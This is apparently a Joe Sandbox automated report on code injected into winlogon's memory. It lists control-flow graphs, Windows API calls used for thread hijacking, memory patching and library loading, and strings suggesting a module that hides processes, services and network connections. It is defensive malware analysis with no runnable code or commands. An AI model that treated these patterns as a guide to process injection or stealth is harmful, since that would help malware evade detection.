GetProcessHeap 24662->24663 24663->24662 24664->24627 24665->24633 24666->24637 24667->24643 24669 2e99175128f GetProcessHeap 24668->24669 24669->24656 24670 2e991722908 24671 2e991722936 24670->24671 24672 2e991722994 VirtualAlloc 24671->24672 24675 2e991722aa7 24671->24675 24673 2e9917229b8 24672->24673 24672->24675 24674 2e991722a2b LoadLibraryA 24673->24674 24673->24675 24674->24673

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                • API String ID: 106492572-2879589442
                                                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction ID: 4162b084441f9fa799f7d865867af365c1d259b96ccff973954a46099f7d702a
                                                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                • Instruction Fuzzy Hash: F7713F36750B9685EB109F67E84869D37B5F784BC9F42112ADE4E87B2ADF34C484CB20

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 53 2e991755c10-2e991755c37 54 2e991755c39-2e991755c48 53->54 55 2e991755c4b-2e991755c56 GetCurrentThreadId 53->55 54->55 56 2e991755c58-2e991755c5d 55->56 57 2e991755c62-2e991755c69 55->57 58 2e99175608f-2e9917560a6 call 2e991757a20 56->58 59 2e991755c7b-2e991755c8f 57->59 60 2e991755c6b-2e991755c76 call 2e991755a40 57->60 63 2e991755c9e-2e991755ca4 59->63 60->58 66 2e991755caa-2e991755cb3 63->66 67 2e991755d75-2e991755d96 63->67 68 2e991755cfa-2e991755d6d call 2e9917545f0 call 2e991754590 call 2e991754550 66->68 69 2e991755cb5-2e991755cf8 call 2e9917586a0 66->69 73 2e991755eff-2e991755f10 call 2e99175759f 67->73 74 2e991755d9c-2e991755dbc GetThreadContext 67->74 81 2e991755d70 68->81 69->81 84 2e991755f15-2e991755f1b 73->84 77 2e991755efa 74->77 78 2e991755dc2-2e991755de3 74->78 77->73 78->77 87 2e991755de9-2e991755df2 78->87 81->63 88 2e991755fde-2e991755fee 84->88 89 2e991755f21-2e991755f78 VirtualProtect FlushInstructionCache 84->89 91 2e991755e72-2e991755e83 87->91 92 2e991755df4-2e991755e05 87->92 98 2e991755ffe-2e99175600a call 2e991754ed0 88->98 99 2e991755ff0-2e991755ff7 88->99 93 2e991755f7a-2e991755f84 89->93 94 2e991755fa9-2e991755fd9 call 2e99175798c 89->94 95 2e991755ef5 91->95 96 2e991755e85-2e991755ea3 91->96 100 2e991755e6d 92->100 101 2e991755e07-2e991755e1c 92->101 93->94 102 2e991755f86-2e991755fa1 call 2e991754470 93->102 94->84 96->95 104 2e991755ea5-2e991755eec call 2e9917539e0 96->104 114 2e99175600f-2e991756015 98->114 99->98 105 2e991755ff9 call 2e9917544c0 99->105 100->95 101->100 107 2e991755e1e-2e991755e68 call 2e991753a50 SetThreadContext 101->107 102->94 104->95 120 2e991755ef0 call 2e9917575bd 104->120 105->98 107->100 118 2e991756057-2e991756075 114->118 119 2e991756017-2e991756055 ResumeThread call 2e99175798c 114->119 122 2e991756089 118->122 123 2e991756077-2e991756086 118->123 119->114 120->95 122->58 123->122
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: d8e9435e92dba28f12f6f3d3e015c2cf867da3c8eee2266169f1663f505a57da
                                                                                • Instruction ID: 7bd6c0a2e4286c8282e8c05088106714b262c530c9c8d43f17b3eadfe12b3437
                                                                                • Opcode Fuzzy Hash: d8e9435e92dba28f12f6f3d3e015c2cf867da3c8eee2266169f1663f505a57da
                                                                                • Instruction Fuzzy Hash: A0D19C76248BC981DA70DB1AE49835A77A0F788B84F55421AEACD47BA6DF3CC581CF10

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 125 2e9917551b0-2e9917551dc 126 2e9917551de-2e9917551e6 125->126 127 2e9917551ed-2e9917551f6 125->127 126->127 128 2e9917551f8-2e991755200 127->128 129 2e991755207-2e991755210 127->129 128->129 130 2e991755212-2e99175521a 129->130 131 2e991755221-2e99175522a 129->131 130->131 132 2e99175522c-2e991755231 131->132 133 2e991755236-2e991755241 GetCurrentThreadId 131->133 134 2e9917557b3-2e9917557ba 132->134 135 2e99175524d-2e991755254 133->135 136 2e991755243-2e991755248 133->136 137 2e991755256-2e99175525c 135->137 138 2e991755261-2e99175526a 135->138 136->134 137->134 139 2e99175526c-2e991755271 138->139 140 2e991755276-2e991755282 138->140 139->134 141 2e9917552ae-2e991755305 call 2e9917557c0 * 2 140->141 142 2e991755284-2e9917552a9 140->142 147 2e99175531a-2e991755323 141->147 148 2e991755307-2e99175530e 141->148 142->134 151 2e991755335-2e99175533e 147->151 152 2e991755325-2e991755332 147->152 149 2e991755310 148->149 150 2e991755316 148->150 153 2e991755390-2e991755396 149->153 154 2e991755386-2e99175538a 150->154 155 2e991755340-2e991755350 151->155 156 2e991755353-2e991755378 call 2e991757950 151->156 152->151 157 2e9917553c5-2e9917553cb 153->157 158 2e991755398-2e9917553b4 call 2e991754470 153->158 154->153 155->156 166 2e99175537e 156->166 167 2e99175540d-2e991755422 call 2e991753da0 156->167 161 2e9917553cd-2e9917553ec call 2e99175798c 157->161 162 2e9917553f5-2e991755408 157->162 158->157 168 2e9917553b6-2e9917553be 158->168 161->162 162->134 166->154 172 2e991755431-2e99175543a 167->172 173 2e991755424-2e99175542c 167->173 168->157 174 2e99175544c-2e99175549a call 2e991758d50 172->174 175 2e99175543c-2e991755449 172->175 173->154 178 2e9917554a2-2e9917554aa 174->178 175->174 179 2e9917554b0-2e99175559b call 2e991757520 178->179 180 2e9917555b7-2e9917555bf 178->180 191 2e99175559d 179->191 192 2e99175559f-2e9917555ae call 2e991754140 179->192 182 2e9917555c1-2e9917555d4 call 2e991754670 180->182 183 2e991755603-2e99175560b 180->183 194 2e9917555d6 182->194 195 2e9917555d8-2e991755601 182->195 184 2e99175560d-2e991755615 183->184 185 2e991755617-2e991755626 183->185 184->185 188 2e991755634-2e991755641 184->188 189 2e99175562f 185->189 190 2e991755628 185->190 196 2e991755644-2e991755699 call 2e9917586a0 188->196 197 2e991755643 188->197 189->188 190->189 191->180 202 2e9917555b0 192->202 203 2e9917555b2 192->203 194->183 195->180 204 2e99175569b-2e9917556a3 196->204 205 2e9917556a8-2e991755741 call 2e9917545f0 call 2e991754550 VirtualProtect 196->205 197->196 202->180 203->178 210 2e991755751-2e9917557b1 205->210 211 2e991755743-2e991755748 GetLastError 205->211 210->134 211->210
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: 8cbbc977435add57f842a8b021d8bf7d85f171c4fe5f6a5014daddc4a4f41314
                                                                                • Instruction ID: 5e5e6cc80da58938c382c042a5af79f0686d595793a5846c133376b694f2e86e
                                                                                • Opcode Fuzzy Hash: 8cbbc977435add57f842a8b021d8bf7d85f171c4fe5f6a5014daddc4a4f41314
                                                                                • Instruction Fuzzy Hash: 8202B732259BC186E760CB56E49835AB7A1F3C4794F11411AEA8E87BAADF7CC484CF50

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID:
                                                                                • API String ID: 1092925422-0
                                                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction ID: fb0d299a20e61ec6a0a7fb258e605bd4a75435ac0177169b2b99dd545a7d002d
                                                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                • Instruction Fuzzy Hash: 83115225745B8682FB149B12F4087596671F744B84F06002EDE8D47765EF3DC588CB30

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocQuery
                                                                                • String ID:
                                                                                • API String ID: 31662377-0
                                                                                • Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                                                • Instruction ID: e30601996f0fb4d63c2e70485e6b4a8988ce8091004eb0a8438b9fc388cea9e2
                                                                                • Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                                                • Instruction Fuzzy Hash: A731F022359AC581EB70DA16E05835A62A4F388784F51052EF5CD46BBADF7DC6D08F34

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction ID: 0635807564e77f13ae74a36e4a72a12785658fe00d21cd20de5c03cb8d955614
                                                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                • Instruction Fuzzy Hash: 4A1161747946C341F721D723F54E7652690BB54345F46011F990A852A7EF3DC4C88E31

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 3733156554-0
                                                                                • Opcode ID: fa80118fe249bd35abe59bcf7ef86c28b21aee29b6d9f8ccec37127585c6c8e8
                                                                                • Instruction ID: 615a944b99c68a79630933e1de177a6d9d4b76c57b13ea9d01f63c64e3bba0af
                                                                                • Opcode Fuzzy Hash: fa80118fe249bd35abe59bcf7ef86c28b21aee29b6d9f8ccec37127585c6c8e8
                                                                                • Instruction Fuzzy Hash: E2F0302626CB8580D630DB07E44934A67A0F3CC7D8F55011AF98E07BAADF38C6C08F10

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 265 2e991722908-2e991722973 call 2e991720f34 * 4 274 2e991722b8b 265->274 275 2e991722979-2e99172297c 265->275 277 2e991722b8d-2e991722ba9 274->277 275->274 276 2e991722982-2e991722985 275->276 276->274 278 2e99172298b-2e99172298e 276->278 278->274 279 2e991722994-2e9917229b2 VirtualAlloc 278->279 279->274 280 2e9917229b8-2e9917229dc call 2e991720d6c 279->280 283 2e991722a0b-2e991722a12 280->283 284 2e9917229de-2e991722a09 call 2e991720d6c 280->284 286 2e991722ab2-2e991722ab9 283->286 287 2e991722a18-2e991722a25 283->287 284->283 288 2e991722b6c-2e991722b89 286->288 289 2e991722abf-2e991722ad6 286->289 287->286 291 2e991722a2b-2e991722a39 LoadLibraryA 287->291 288->277 289->288 292 2e991722adc 289->292 293 2e991722a3b-2e991722a45 291->293 294 2e991722a9d-2e991722aa5 291->294 297 2e991722ae2-2e991722af7 292->297 298 2e991722a48-2e991722a4c 293->298 294->291 295 2e991722aa7-2e991722aac 294->295 295->286 299 2e991722b5b-2e991722b66 297->299 300 2e991722af9-2e991722b0a 297->300 301 2e991722a9a 298->301 302 2e991722a4e-2e991722a52 298->302 299->288 299->297 304 2e991722b0c-2e991722b13 300->304 305 2e991722b15-2e991722b19 300->305 301->294 306 2e991722a7d-2e991722a87 302->306 307 2e991722a54-2e991722a7b 302->307 309 2e991722b48-2e991722b59 304->309 310 2e991722b1b-2e991722b22 305->310 311 2e991722b24-2e991722b28 305->311 308 2e991722a8d-2e991722a98 306->308 307->308 308->298 309->299 309->300 310->309 312 2e991722b3a-2e991722b3e 311->312 313 2e991722b2a-2e991722b38 311->313 312->309 314 2e991722b40-2e991722b43 312->314 313->309 314->309
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                • String ID:
                                                                                • API String ID: 3550616410-0
                                                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction ID: 2928828b46b0df8fee0d695b6055512b29190d9793752729c3f51ee003bf7ea7
                                                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction Fuzzy Hash: 056128327426D287EF68CF16D44476C73A1FB04B94F55881ADE1907786EB38D893CB20

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000002E991751650: GetProcessHeap.KERNEL32 ref: 000002E99175165B
                                                                                  • Part of subcall function 000002E991751650: HeapAlloc.KERNEL32 ref: 000002E99175166A
                                                                                  • Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E9917516DA
                                                                                  • Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E991751707
                                                                                  • Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E991751721
                                                                                  • Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E991751741
                                                                                  • Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E99175175C
                                                                                  • Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E99175177C
                                                                                  • Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E991751797
                                                                                  • Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E9917517B7
                                                                                  • Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E9917517D2
                                                                                  • Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E9917517F2
                                                                                • Sleep.KERNEL32 ref: 000002E991751C43
                                                                                • SleepEx.KERNELBASE ref: 000002E991751C49
                                                                                  • Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E99175180D
                                                                                  • Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E99175182D
                                                                                  • Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E991751848
                                                                                  • Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E991751868
                                                                                  • Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E991751883
                                                                                  • Part of subcall function 000002E991751650: RegOpenKeyExW.ADVAPI32 ref: 000002E9917518A3
                                                                                  • Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E9917518BE
                                                                                  • Part of subcall function 000002E991751650: RegCloseKey.ADVAPI32 ref: 000002E9917518C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction ID: e54bd70fbade5051346577d6c3055090c9beb650c3de455b1e6ccabc5511d51c
                                                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                • Instruction Fuzzy Hash: 4C31CC6538078391FA50AB37DA4935A13A5BB44BD6F1A502BDE0B87697FF34C8D08A70

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 354 2e991782908-2e991782973 call 2e991780f34 * 4 363 2e991782979-2e99178297c 354->363 364 2e991782b8b 354->364 363->364 366 2e991782982-2e991782985 363->366 365 2e991782b8d-2e991782ba9 364->365 366->364 367 2e99178298b-2e99178298e 366->367 367->364 368 2e991782994-2e9917829b2 VirtualAlloc 367->368 368->364 369 2e9917829b8-2e9917829dc call 2e991780d6c 368->369 372 2e991782a0b-2e991782a12 369->372 373 2e9917829de-2e991782a09 call 2e991780d6c 369->373 374 2e991782ab2-2e991782ab9 372->374 375 2e991782a18-2e991782a25 372->375 373->372 379 2e991782b6c-2e991782b89 374->379 380 2e991782abf-2e991782ad6 374->380 375->374 377 2e991782a2b-2e991782a39 375->377 387 2e991782a3b-2e991782a45 377->387 388 2e991782a9d-2e991782aa5 377->388 379->365 380->379 381 2e991782adc 380->381 382 2e991782ae2-2e991782af7 381->382 385 2e991782af9-2e991782b0a 382->385 386 2e991782b5b-2e991782b66 382->386 390 2e991782b15-2e991782b19 385->390 391 2e991782b0c-2e991782b13 385->391 386->379 386->382 392 2e991782a48-2e991782a4c 387->392 388->377 393 2e991782aa7-2e991782aac 388->393 395 2e991782b24-2e991782b28 390->395 396 2e991782b1b-2e991782b22 390->396 394 2e991782b48-2e991782b59 391->394 397 2e991782a9a 392->397 398 2e991782a4e-2e991782a52 392->398 393->374 394->385 394->386 399 2e991782b3a-2e991782b3e 395->399 400 2e991782b2a-2e991782b38 395->400 396->394 397->388 401 2e991782a54-2e991782a7b 398->401 402 2e991782a7d-2e991782a87 398->402 399->394 404 2e991782b40-2e991782b43 399->404 400->394 403 2e991782a8d-2e991782a98 401->403 402->403 403->392 404->394
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2686009347.000002E991780000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991780000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction ID: f97b769f531a54a6f9503ce92d864bf0fdaadaae578e81e34ce15da814df0fdb
                                                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                • Instruction Fuzzy Hash: 9E61287274269287FB68CF16D48876CB791FB04B95F56801BDE1907786EB38D892CB20

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 476 2e991752cdc-2e991752d55 call 2e99176ecc0 479 2e991753090-2e9917530b3 476->479 480 2e991752d5b-2e991752d61 476->480 480->479 481 2e991752d67-2e991752d6a 480->481 481->479 482 2e991752d70-2e991752d73 481->482 482->479 483 2e991752d79-2e991752d89 GetModuleHandleA 482->483 484 2e991752d9d 483->484 485 2e991752d8b-2e991752d9b GetProcAddress 483->485 486 2e991752da0-2e991752dbe 484->486 485->486 486->479 488 2e991752dc4-2e991752de3 StrCmpNIW 486->488 488->479 489 2e991752de9-2e991752ded 488->489 489->479 490 2e991752df3-2e991752dfd 489->490 490->479 491 2e991752e03-2e991752e0a 490->491 491->479 492 2e991752e10-2e991752e23 491->492 493 2e991752e25-2e991752e31 492->493 494 2e991752e33 492->494 495 2e991752e36-2e991752e3a 493->495 494->495 496 2e991752e4a 495->496 497 2e991752e3c-2e991752e48 495->497 498 2e991752e4d-2e991752e57 496->498 497->498 499 2e991752f4d-2e991752f51 498->499 500 2e991752e5d-2e991752e60 498->500 501 2e991752f57-2e991752f5a 499->501 502 2e991753082-2e99175308a 499->502 503 2e991752e72-2e991752e7c 500->503 504 2e991752e62-2e991752e6f call 2e991751a14 500->504 505 2e991752f5c-2e991752f68 call 2e991751a14 501->505 506 2e991752f6b-2e991752f75 501->506 502->479 502->492 508 2e991752e7e-2e991752e8b 503->508 509 2e991752eb0-2e991752eba 503->509 504->503 505->506 511 2e991752fa5-2e991752fa8 506->511 512 2e991752f77-2e991752f84 506->512 508->509 514 2e991752e8d-2e991752e9a 508->514 515 2e991752eea-2e991752eed 509->515 516 2e991752ebc-2e991752ec9 509->516 521 2e991752faa-2e991752fb3 call 2e991751d28 511->521 522 2e991752fb5-2e991752fc2 lstrlenW 511->522 512->511 520 2e991752f86-2e991752f93 512->520 523 2e991752e9d-2e991752ea3 514->523 518 2e991752eef-2e991752ef9 call 2e991751d28 515->518 519 2e991752efb-2e991752f08 lstrlenW 515->519 516->515 524 2e991752ecb-2e991752ed8 516->524 518->519 532 2e991752f43-2e991752f48 518->532 527 2e991752f0a-2e991752f14 519->527 528 2e991752f2b-2e991752f3d call 2e991753930 519->528 529 2e991752f96-2e991752f9c 520->529 521->522 540 2e991752ffa-2e991753005 521->540 533 2e991752fe5-2e991752fef call 2e991753930 522->533 534 2e991752fc4-2e991752fce 522->534 531 2e991752ea9-2e991752eae 523->531 523->532 525 2e991752edb-2e991752ee1 524->525 525->532 535 2e991752ee3-2e991752ee8 525->535 527->528 538 2e991752f16-2e991752f29 call 2e991751554 527->538 528->532 543 2e991752ff2-2e991752ff4 528->543 539 2e991752f9e-2e991752fa3 529->539 529->540 531->509 531->523 532->543 533->543 534->533 544 2e991752fd0-2e991752fe3 call 2e991751554 534->544 535->515 535->525 538->528 538->532 539->511 539->529 547 2e99175307c-2e991753080 540->547 548 2e991753007-2e99175300b 540->548 543->502 543->540 544->533 544->540 547->502 552 2e99175300d-2e991753011 548->552 553 2e991753013-2e99175302d call 2e9917586a0 548->553 552->553 555 2e991753030-2e991753033 552->555 553->555 558 2e991753056-2e991753059 555->558 559 2e991753035-2e991753053 call 2e9917586a0 555->559 558->547 560 2e99175305b-2e991753079 call 2e9917586a0 558->560 559->558 560->547
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                • API String ID: 2119608203-3850299575
                                                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction ID: 098ea08ed377d774df965bfb112f93bc795948e7bdae4f92a49af68d9e7659d5
                                                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                • Instruction Fuzzy Hash: 2FB1BE22350AD2C2EB698F27D5487AA63A5FB44B84F56501FEE09537A6DF35CCC0CB60
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 3140674995-0
                                                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction ID: 79b72996a53cbe8afecd15f437898d8dfdb403264fe82a385b16de759ba5379f
                                                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                • Instruction Fuzzy Hash: 6F315E72344BC19AEB608F62E8447ED7360F788744F45442ADA4D47B99EF38C588CB20
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction ID: 7b04f8da15ebd91ecf27d723d70f24566cd981bda809e52e17ef89d9a1dc94c9
                                                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                • Instruction Fuzzy Hash: 84319232254FC196DB60CF26E8443AE73A4F788794F51012AEA9D43B96DF38C595CF20
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                • String ID:
                                                                                • API String ID: 1443284424-0
                                                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction ID: 76cff87c33ca843c4ecc309d17d9a6d63332ff18c120fdf2b1f541d030c209c1
                                                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                • Instruction Fuzzy Hash: FEE1F132754AC18AE700CF66D4882DE7BB1F3457C8F55411BDE4E97B9ADA38C89ACB10
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                                                                • Instruction ID: 68dee5b66efbf2576b9e234837574920ade6715da3ddccdb4a9f474ddcf4bdf5
                                                                                • Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                                                                • Instruction Fuzzy Hash: E851E3227547D188F7209B77ED083AE7BA5B745BD4F16421AEEA847B96CF38C181CB10
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
                                                                                • Instruction ID: e5bc22274be8ea3966a17ebb5f904d0e78f69c01a695bda46f1ee3afabaffa2c
                                                                                • Opcode Fuzzy Hash: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
                                                                                • Instruction Fuzzy Hash: D0F062717542958AEBA48F29F94671977E0F308380F90841ED689C3B04D63C81A19F24
                                                                                Memory Dump Source
                                                                                • Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
